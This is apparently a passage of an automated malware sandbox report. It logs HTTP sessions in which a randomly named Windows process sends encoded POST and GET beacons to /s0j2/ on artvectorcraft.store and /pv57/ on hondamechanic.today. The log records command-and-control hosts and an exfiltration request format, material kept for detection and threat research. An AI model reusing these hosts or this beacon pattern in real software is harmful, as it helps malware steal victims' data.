                                                      Jul 3, 2024 17:59:17.305635929 CEST537INData Raw: 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d
                                                      Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      42192.168.2.649772142.250.74.211806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:59:19.197988987 CEST650OUTPOST /s0j2/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 237
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.artvectorcraft.store
                                                      Origin: http://www.artvectorcraft.store
                                                      Referer: http://www.artvectorcraft.store/s0j2/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 4f 64 6a 54 48 74 75 58 3d 4d 65 70 64 30 6b 6e 46 5a 42 43 4d 71 79 4f 53 34 6e 4d 32 4e 34 73 68 6e 54 33 32 6b 6c 7a 4b 72 66 6d 69 71 58 55 4a 56 46 4e 57 75 4d 55 75 4b 69 4d 32 36 4d 48 4a 69 35 44 46 53 37 7a 72 36 54 78 54 73 6e 75 67 6e 61 2b 33 76 7a 39 41 30 69 65 38 6d 67 33 4c 35 74 56 6b 2f 49 38 41 2f 63 6c 35 55 55 35 34 61 79 31 6d 6f 33 65 74 70 31 6a 54 67 52 31 2f 42 6e 39 63 68 66 4e 57 69 59 37 35 72 52 73 43 30 56 76 56 78 4e 65 4b 31 6e 30 58 41 71 45 2f 48 79 46 68 72 62 44 53 59 64 77 63 47 76 78 4b 39 41 6c 30 52 32 6f 58 48 76 54 6b 46 75 4c 71 73 57 67 48 46 38 66 4f 67 6e 6c 67 62 6e 55 75 65 39 51 31 69 37 4f 59 35 77 4b 41 5a 51 78 6f 4a 4c 74 74 32 75 45 71 38 41 3d 3d
                                                      Data Ascii: OdjTHtuX=Mepd0knFZBCMqyOS4nM2N4shnT32klzKrfmiqXUJVFNWuMUuKiM26MHJi5DFS7zr6TxTsnugna+3vz9A0ie8mg3L5tVk/I8A/cl5UU54ay1mo3etp1jTgR1/Bn9chfNWiY75rRsC0VvVxNeK1n0XAqE/HyFhrbDSYdwcGvxK9Al0R2oXHvTkFuLqsWgHF8fOgnlgbnUue9Q1i7OY5wKAZQxoJLtt2uEq8A==
                                                      Jul 3, 2024 17:59:19.885412931 CEST1236INHTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:59:19 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Server: ghs
                                                      Content-Length: 1566
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                      Jul 3, 2024 17:59:19.885433912 CEST537INData Raw: 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d
                                                      Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      43192.168.2.649773142.250.74.211806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:59:21.734000921 CEST1663OUTPOST /s0j2/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1249
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.artvectorcraft.store
                                                      Origin: http://www.artvectorcraft.store
                                                      Referer: http://www.artvectorcraft.store/s0j2/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 4f 64 6a 54 48 74 75 58 3d 4d 65 70 64 30 6b 6e 46 5a 42 43 4d 71 79 4f 53 34 6e 4d 32 4e 34 73 68 6e 54 33 32 6b 6c 7a 4b 72 66 6d 69 71 58 55 4a 56 46 31 57 75 2f 63 75 49 46 59 32 35 4d 48 4a 2b 70 44 45 53 37 7a 79 36 54 70 66 73 6e 6a 56 6e 66 69 33 75 51 31 41 78 51 32 38 7a 51 33 4c 6b 39 56 35 77 6f 38 56 2f 59 35 31 55 51 56 34 61 79 31 6d 6f 78 61 74 2b 77 66 54 69 52 31 38 43 6e 38 54 71 2f 4e 71 69 5a 65 47 72 52 67 4e 31 6c 50 56 79 74 4f 4b 34 78 6f 58 50 71 45 39 4b 53 45 6e 72 62 2f 33 59 64 74 6c 47 73 74 67 39 41 52 30 42 6e 4e 56 43 50 50 37 62 6f 58 74 2f 45 51 39 4f 49 75 35 6f 78 74 48 58 30 67 6f 52 66 63 4c 76 65 4b 46 34 44 37 6e 4d 43 68 55 4c 74 41 4d 6a 4b 4a 6d 68 78 68 6f 38 31 6a 62 50 32 70 72 4a 70 46 4c 62 78 4c 4e 69 67 66 4c 67 49 4b 42 35 51 38 63 66 73 47 5a 61 30 32 65 73 46 59 56 4d 46 57 35 79 53 51 30 35 38 53 47 71 4b 2f 68 69 50 77 58 61 55 67 6e 33 6f 56 75 59 74 71 38 4c 73 62 36 31 48 55 41 4f 50 68 37 65 56 49 44 64 70 4d 6f 55 58 43 2f 69 78 45 36 72 [TRUNCATED]
                                                      Data Ascii: OdjTHtuX=Mepd0knFZBCMqyOS4nM2N4shnT32klzKrfmiqXUJVF1Wu/cuIFY25MHJ+pDES7zy6TpfsnjVnfi3uQ1AxQ28zQ3Lk9V5wo8V/Y51UQV4ay1moxat+wfTiR18Cn8Tq/NqiZeGrRgN1lPVytOK4xoXPqE9KSEnrb/3YdtlGstg9AR0BnNVCPP7boXt/EQ9OIu5oxtHX0goRfcLveKF4D7nMChULtAMjKJmhxho81jbP2prJpFLbxLNigfLgIKB5Q8cfsGZa02esFYVMFW5ySQ058SGqK/hiPwXaUgn3oVuYtq8Lsb61HUAOPh7eVIDdpMoUXC/ixE6rbs8DC+Wf10Ho9YlOxlVBUpD2/G88bqhuN5xqG1WeRP8R0oXZII+eMtGPoWOwZaTWTDsYXFsqchWd+uBa2rcEtTlK+PTJetVG2Mkolj0cjjkSi4Kwv9eB6fONmznvLhHgOFz1ouycajXQ+OAKt16yrDqEMnC2D3ZPEDAPRPO+PbglzswYOM1lQNhqnDrt6WlomESUVO5stRxvrMmceXRrVmAjiyfK/x1P88b7kA4IXl+p4IGKcdOh3rOF+Xx9BHYHzpKZ/iJNxb8673CIuaIA1LgcLnDESQL+sSkQzBHqvVzDWIwTxYrXA3T/f/nfWX/4MJGiapTj+deMH/xkBbAXp0yXppeZJKD5k0Oy9YeqrO9ZH1BfEykuLT+oLNmXUCBm7lZXrytjIFKWDrv4oO32LavnV1+T4V3gW3CM3HlC5BVmG8xy/xk5ckVm2WwMqXfizess7ID1T3rSrsLAnw1ILu/qKZXLJPiDr905kqhLgWz4nitLSuaAwa07gR4uaV3Po7ptGo+3dWG7MIsGbEat6epZxUWOBRom8Chw20+XHae99HUSDUMhts3YOnLY9xcPi00+r6Vl1wN39f3krvk9AeHX/S2BsIA6XbFYh6BHAWwM3bTeiczNnu+oqztSYdGgJlUSGx84BPcEcSj3p9kxOqqI8o8XXJEC8J [TRUNCATED]
                                                      Jul 3, 2024 17:59:22.353934050 CEST1236INHTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:59:22 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Server: ghs
                                                      Content-Length: 1566
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                      Jul 3, 2024 17:59:22.358095884 CEST537INData Raw: 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d
                                                      Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      44192.168.2.649774142.250.74.211806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:59:24.259685993 CEST353OUTGET /s0j2/?OdjTHtuX=BcB93STIeRzesDqYzmgjF/8Aqg2qoGbugvfC7gVQd0Epq+RTfyEF6eLz+ZShIqPWgjFYuR+pkePM3whd8giEyH2988JCuLY+vIFLWxAqbBoWpgzIu1DPnhlaAUBnkOtEvd711RA=&Y6vp=3PLd8j HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.artvectorcraft.store
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:59:24.911488056 CEST1236INHTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:59:24 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Server: ghs
                                                      Content-Length: 1728
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                      Jul 3, 2024 17:59:24.913105011 CEST699INData Raw: 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d
                                                      Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      45192.168.2.64977564.190.62.22806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:59:38.291156054 CEST623OUTPOST /pv57/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 213
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.hondamechanic.today
                                                      Origin: http://www.hondamechanic.today
                                                      Referer: http://www.hondamechanic.today/pv57/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 4f 64 6a 54 48 74 75 58 3d 33 57 30 70 4e 37 57 4e 79 2b 55 52 6c 61 52 62 58 63 58 39 61 47 55 39 6f 55 65 2b 4c 61 4b 43 2f 2f 4c 4a 33 5a 69 41 55 2f 48 55 50 4e 6b 58 45 61 36 63 68 36 6d 78 65 62 68 4c 63 69 31 75 4b 57 49 57 76 73 46 75 6c 50 52 63 45 35 70 45 44 42 65 47 35 68 4a 48 33 62 48 56 72 69 6b 65 70 78 72 4b 77 54 50 74 51 54 53 5a 44 68 6a 4d 76 70 70 4e 6c 77 67 53 65 38 47 69 37 62 77 64 71 2f 51 49 42 50 6a 36 34 47 74 72 74 54 49 50 39 76 34 6e 78 61 65 72 30 6d 73 35 5a 39 33 32 6f 6f 42 43 30 5a 2f 6b 43 77 4f 6f 42 69 46 39 74 4f 50 55 61 35 77 47 6f 6c 50 48 39 58 49 6d 64 76 32 34 4e 71 46 6e 4e 48 50 79
                                                      Data Ascii: OdjTHtuX=3W0pN7WNy+URlaRbXcX9aGU9oUe+LaKC//LJ3ZiAU/HUPNkXEa6ch6mxebhLci1uKWIWvsFulPRcE5pEDBeG5hJH3bHVrikepxrKwTPtQTSZDhjMvppNlwgSe8Gi7bwdq/QIBPj64GtrtTIP9v4nxaer0ms5Z932ooBC0Z/kCwOoBiF9tOPUa5wGolPH9XImdv24NqFnNHPy
                                                      Jul 3, 2024 17:59:38.943396091 CEST305INHTTP/1.1 405 Not Allowed
                                                      date: Wed, 03 Jul 2024 15:59:38 GMT
                                                      content-type: text/html
                                                      content-length: 154
                                                      server: Parking/1.0
                                                      connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      46192.168.2.64977664.190.62.22806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:59:40.822772026 CEST647OUTPOST /pv57/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 237
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.hondamechanic.today
                                                      Origin: http://www.hondamechanic.today
                                                      Referer: http://www.hondamechanic.today/pv57/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 4f 64 6a 54 48 74 75 58 3d 33 57 30 70 4e 37 57 4e 79 2b 55 52 6a 36 42 62 56 37 37 39 4f 57 55 69 72 55 65 2b 43 36 4b 4f 2f 2f 50 4a 33 64 36 51 56 4c 72 55 50 74 55 58 57 4f 57 63 74 61 6d 78 57 37 68 30 57 43 31 31 4b 57 4e 70 76 74 70 75 6c 50 46 63 45 38 4e 45 43 32 71 4a 32 52 4a 46 38 37 48 58 6c 43 6b 65 70 78 72 4b 77 58 76 58 51 54 36 5a 44 52 54 4d 76 49 70 4d 73 51 67 64 66 38 47 69 78 4c 78 55 71 2f 51 71 42 4c 69 66 34 45 46 72 74 53 55 50 39 36 4d 6b 6f 4b 66 67 77 6d 74 79 4b 73 53 63 69 49 63 39 39 59 37 6f 58 79 65 4a 4e 30 45 6e 78 39 50 33 49 70 51 45 6f 6e 58 31 39 33 49 4d 66 76 4f 34 66 39 4a 41 43 7a 71 52 62 72 2b 38 52 73 65 32 6d 62 44 34 4b 79 6f 74 78 6a 34 38 63 51 3d 3d
                                                      Data Ascii: OdjTHtuX=3W0pN7WNy+URj6BbV779OWUirUe+C6KO//PJ3d6QVLrUPtUXWOWctamxW7h0WC11KWNpvtpulPFcE8NEC2qJ2RJF87HXlCkepxrKwXvXQT6ZDRTMvIpMsQgdf8GixLxUq/QqBLif4EFrtSUP96MkoKfgwmtyKsSciIc99Y7oXyeJN0Enx9P3IpQEonX193IMfvO4f9JACzqRbr+8Rse2mbD4Kyotxj48cQ==
                                                      Jul 3, 2024 17:59:41.482255936 CEST305INHTTP/1.1 405 Not Allowed
                                                      date: Wed, 03 Jul 2024 15:59:41 GMT
                                                      content-type: text/html
                                                      content-length: 154
                                                      server: Parking/1.0
                                                      connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      47192.168.2.64977764.190.62.2280
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:59:43.359024048 CEST1660OUTPOST /pv57/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1249
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.hondamechanic.today
                                                      Origin: http://www.hondamechanic.today
                                                      Referer: http://www.hondamechanic.today/pv57/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 4f 64 6a 54 48 74 75 58 3d 33 57 30 70 4e 37 57 4e 79 2b 55 52 6a 36 42 62 56 37 37 39 4f 57 55 69 72 55 65 2b 43 36 4b 4f 2f 2f 50 4a 33 64 36 51 56 4b 2f 55 50 38 30 58 45 35 43 63 75 61 6d 78 63 62 68 78 57 43 31 30 4b 57 31 74 76 74 30 5a 6c 4e 39 63 45 61 42 45 46 44 47 4a 68 68 4a 46 7a 62 48 57 72 69 6b 4c 70 77 62 4f 77 54 4c 58 51 54 36 5a 44 54 62 4d 6f 5a 70 4d 71 51 67 53 65 38 47 6d 37 62 78 38 71 2f 49 51 42 4c 6e 71 34 31 6c 72 73 32 30 50 77 6f 55 6b 67 4b 66 69 33 6d 74 68 4b 73 75 48 69 49 42 47 39 59 4f 46 58 79 36 4a 4a 43 46 38 31 35 4f 73 4c 70 49 33 70 55 76 57 34 58 39 34 47 50 4b 64 65 4f 78 32 64 33 62 79 53 75 2b 7a 51 4d 48 43 68 36 2f 50 46 46 74 31 77 42 6b 30 4a 64 4c 31 49 48 76 68 56 70 4b 34 4b 42 6d 31 43 65 4a 72 77 62 54 34 75 57 4e 62 6d 47 4b 42 59 35 6b 59 47 6d 72 56 37 33 70 4b 5a 6a 36 49 44 75 73 33 55 76 58 39 38 4d 46 45 51 47 41 4e 6d 65 77 79 68 39 48 70 2f 44 46 4f 45 58 2f 4a 61 54 61 2b 44 33 6a 39 7a 35 32 59 2f 34 58 68 57 72 51 77 31 6e 6a 6d 4b [TRUNCATED]
